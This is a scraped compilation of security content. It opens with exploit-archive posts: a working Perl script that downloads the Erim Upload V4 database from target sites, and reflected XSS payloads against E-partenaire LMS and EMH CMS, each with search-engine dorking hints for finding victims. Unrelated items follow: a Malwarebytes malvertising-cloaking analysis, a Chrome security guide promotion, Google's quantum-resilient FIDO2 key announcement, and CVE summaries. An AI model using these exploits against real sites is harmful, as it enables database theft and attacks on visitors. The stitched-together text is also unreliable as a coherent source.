Erim Upload version 4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Erim Upload V4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://script.horje.com/view/218412                                                                               |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (upload/veritabani/erimicel.mdb ) file  
    The (upload/veritabani/erimicel.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# Erim Upload V4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : script.horje.com/view/218412

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('Erim Upload V4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="upload/veritabani/erimicel.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/erimicel.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/erimicel.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Erim Upload 4 Database Disclosure

E-partenaire LMS version 1.0.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : E-partenaire LMS v1.0.0 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://agence-web-aix-en-provence.fr/                                                                              |  | # Dork      : "Conception : e-partenaire" inurl:.php?id=                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /actualites.php?id=16%27%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3E[+] https://127.0.0.1/ambiancepackcom/fr/actualites.php?id=16%27%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

E-partenaire LMS 1.0.0 Cross Site Scripting

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

**EMH CMS 0.1 Cross Site Scripting**

Posted Aug 16, 2023

Authored by indoushka

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | c58615aff6cd57a5ca22a34be62372e9e81249eb20b812f9a35ccd440af33052

Download | Favorite | View

**EMH CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : EMH CMS v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(64-bit)                                             | | # Vendor    : http://www.theemhglobal.com/                                                                                       |  | # Dork      : Designed by EMH TheEmhGlobal                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/freedomcentreinternationalorg/icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,973)
*   Arbitrary (16,202)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,280)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,437)
*   Encryption (2,370)
*   Exploit (51,900)
*   File Inclusion (4,222)
*   File Upload (974)
*   Firewall (821)
*   Info Disclosure (2,775)
*   Intrusion Detection (892)
*   Java (3,044)
*   JavaScript (859)
*   Kernel (6,674)
*   Local (14,453)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,777)
*   Root (3,584)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,373)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,778)
*   Web (9,668)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,944)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,470)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,734)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,822)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,573)
*   Other

EMH CMS 0.1 Cross Site Scripting

Categories: Threat Intelligence
Tags: malvertising

Tags: google

Tags: ads

Tags: malware

Tags: fingerprinting

Malicious ads via search engine results page are getting harder to identify thanks to advanced fingerprinting techniques



(Read more...)




The post Malvertisers up their game against researchers appeared first on Malwarebytes Labs.

Threat actors constantly take notice of the work and takedown efforts initiated by security researchers. In this constant game of cat and mouse chasing, tactics and techniques keep evolving from simple to more complex, and more covert.

This is a trend we have observed time and time again, no matter the playing field, from exploit kits to credit card skimmers. As defenders, we may have mixed reactions: on the one hand, as technical people we naturally appreciate a well-written exploit or piece of code and the challenge it creates. There is something about it that sparks our interest and curiosity. On the other hand, we know that the people behind it have bad intentions and intend on doing harm.

In today's blog post, we look at a recent malvertising chain that started using a more advanced cloaking technique to remain under the radar. Based on our tracking, it is a new trend for these malvertising campaigns dropping infostealers and other malware used by initial access brokers in ransomware operations.

**Malicious ad and cloaking**

Threat actors continue to target certain IT programs such as remote access programs and scanners by creating ads that are displayed on popular search engines such as Google. The ad below is for the Advanced IP scanner tool and was found when performing a Google search from a US IP address.

_Figure 1: Malicious ad on Google for Advanced IP Scanner_

The domain name advnced-lp-scanner\[.\]com may look legitimate but it is not. It was registered on Jul 30 2023 and is hosted on a server in Russia at 185.11.61\[.\]65.

If you were to investigate this ad, you would likely open it up in a virtual machine and see what it leads to. One of the most common checks that is done by threat actors is a simple server-side IP check to determine whether you are running a VPN or proxy or have visited the site before. That means that as researchers we need to constantly find new IP addresses that look legitimate and then revisit the page again.

Interestingly, even with a fresh IP address the landing page looked innocent. This can happen for different reasons, for example if the threat actor is in the process of setting up the site and hasn't finished swapping it to the malicious version. Or it could also be that the time of day is not in line with when the attacker is making the switch.

_Figure 2: Decoy page without any malware to download_

**Advanced fingerprinting**

Looking closer at the network requests from the ad to the web server we saw new code that looked suspicious. This is Base64 encoded JavaScript that is loaded before anything else on the page.

In fact, this client-side request was performed after a server-side IP check to determine if your IP address was clean. In other words, this is another layer that needs to be processed before we get to see what we are looking for.

_Figure 3: Suspicious Base64-encoded code_

We can deobfuscate this code using CyberChef and further beautify it to see what it does. Here are some of those checks:

*   browser properties such as window and screen size
*   time zone (difference between UTC and local time)
*   browser rendering capabilities related to video card driver
*   MIME type for MP4 file format 

_Figure 4: Decoded fingerprinting script_

Many tools used by researchers are scripted in Python and will fail the test. Same goes for virtual machines, the WEBGL\_debug\_renderer\_info API can help to detect if you are using virtualization such as VMware or VirtualBox.

The data that is collected from visitors is then sent back to the attacker's website via a POST request for further parsing and to determine what action to take next.

_Figure 5: POST request sending victim's details to attacker_

Below is the web traffic view of a successful redirection to the malicious page where the victim can download the malware payload.

_Figure 6: Web traffic from malicious ad to payload page_

And this is the malware landing page:

_Figure 7: Malware landing page after successfully passing the fingerprinting checks_

We can now collect the payload and make sure that it is detected.

**Conclusion**

By using better filtering before redirecting potential victims to malware, threat actors ensure that their malicious ads and infrastructure remain online longer. Not only does it make it more difficult for defenders to identify and report such events, it also likely has an impact on takedown actions. In the majority of cases where we have reported malvertising incidents, the abused platform needs to validate the information before taking action against the advertiser.

This makes sense as reports could be erroneous and lead to advertising accounts being suspended unjustly. However, it also means that while an incident is being investigated and reproduced (which could take hours), people will click on those ads and download malware.

As we continue to report malvertising campaigns, we improve our understanding of the threat actors' TTPs and adjust our toolsets accordingly. Any intelligence gathered is shared within our products and ultimately delivered to Malwarebytes customers via web and malware protection updates to ensure they remain protected.

Malvertisers up their game against researchers

More and more organizations are choosing Google Workspace as their default employee toolset of choice. But despite the productivity advantages, this organizational action also incurs a new security debt. Security teams now have to find a way to adjust their security architecture to this new cloud workload.
Some teams may rely on their existing network security solutions. According to a new guide

Browser Security/ Online Security

More and more organizations are choosing Google Workspace as their default employee toolset of choice. But despite the productivity advantages, this organizational action also incurs a new security debt. Security teams now have to find a way to adjust their security architecture to this new cloud workload.

Some teams may rely on their existing network security solutions. According to a **new guide**, this is a hit and a miss. Network solutions, the guide claims, just don't cover all SaaS and browsing requirements. Meanwhile, Google offers a wide range of native security functionalities built-in to Chrome. These functionalities enable the organization to leverage the browser for consolidating security, simplifying operations and reducing costs.

If you're wary about trusting Chrome with your security, then the guide is recommended to read. In great detail, it explains which security features Chrome offers users.

These include:

*   Forcing users to sign into Chrome, to ensure the organization's user-level policies and settings are applied.
*   Enforcing Chrome auto-updates, for ensuring the browser is updated and security patches are applied as they are released.
*   Controlling password and settings sync, to prevent credential theft.
*   Extension management, to govern the installation of potentially malicious browser extensions.
*   Reports and monitoring, to help security teams hunt for potential threats and maintain the security hygiene of their environments.
*   Warning about potentially risky sites and downloads.
*   Event logs, for auditing purposes.

To complement these security features, **this guide proposes to add a new tool** to the security stack – a browser security extension. Such a solution adds the ability to detect and prevent browser-based attacks in real-time. It monitors and analyzes live web session activity, providing granular visibility and enforcement capabilities to browse events and mitigating risks. As such, it supports the discovery of shadow SaaS, SaaS DLP, zero trust verification, phishing protection, access management for unmanaged devices, and more.

The guide recommends implementing a browser extension that is compatible with all commercial browsers (Unlike "Enterprise Browsers" solutions that replace the existing browsers). The extension "resides 'within' the existing browser, has visibility into every event in the web session that the browser has, and can interfere – if needed - in the actual session to apply a protective action." As a result, it makes use of all Chrome's security features.

Security teams that read the report will be supplied with detailed information required for making a rational choice about how best to secure the Google Workspace. They can weigh all the factors and decide how to enhance their Google app security in general, and their Chrome browser in particular.

**Read the complete guide here**.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Guide: How Google Workspace-based Organizations can leverage Chrome to improve Security

Google on Tuesday announced the first quantum resilient FIDO2 security key implementation as part of its OpenSK security keys initiative.
"This open-source hardware optimized implementation uses a novel ECC/Dilithium hybrid signature schema that benefits from the security of ECC against standard attacks and Dilithium's resilience against quantum attacks," Elie Bursztein and Fabian Kaczmarczyck

Password Security / Encryption

Google on Tuesday announced the first quantum resilient FIDO2 security key implementation as part of its OpenSK security keys initiative.

"This open-source hardware optimized implementation uses a novel ECC/Dilithium hybrid signature schema that benefits from the security of ECC against standard attacks and Dilithium's resilience against quantum attacks," Elie Bursztein and Fabian Kaczmarczyck said.

OpenSK is an open-source implementation for security keys written in Rust that supports both FIDO U2F and FIDO2 standards.

The development comes less than a week after the tech giant said it plans to add support for quantum-resistant encryption algorithms in Chrome 116 to set up symmetric keys in TLS connections.

It's also part of broader efforts to switch to cryptographic algorithms that can withstand quantum attacks in the future, necessitating the need to incorporate such technologies early on to facilitate a gradual rollout.

"Fortunately, with the recent standardization of public key quantum resilient cryptography including the Dilithium algorithm, we now have a clear path to secure security keys against quantum attacks," the search giant said.

Similar to how Chrome's hybrid mechanism – which is a combination of X25519 and Kyber-768 – Google's proposed FIDO2 security key implementation is a mix of Elliptic Curve Digital Signature Algorithm (ECDSA) and the recently standardized quantum resistant signature algorithm, Dilithium.

The hybrid signature schema, developed in partnership with ETH Zürich, is a Rust-based memory-optimized implementation that only requires 20 KB of memory, making it ideal to run on security keys' constrained hardware.

The company said it is "hoping to see this implementation (or a variant of it), being standardized as part of the FIDO2 key specification and supported by major web browsers so that users' credentials can be protected against quantum attacks."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Introduces First Quantum Resilient FIDO2 Security Key

DVWA v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at blind\source\high.php.

CVE-2023-39848: GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)

Insufficient data validation in Systems Extensions in Google Chrome on ChromeOS prior to 116.0.5845.120 allowed an attacker who convinced a user to install a malicious extension to bypass file restrictions via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-4369

Use after free in Offline in Google Chrome on Android prior to 116.0.5845.96 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-2312: Stable Channel Update for Desktop

Use after free in Audio in Google Chrome prior to 116.0.5845.96 allowed a remote attacker who has convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

Tag

#google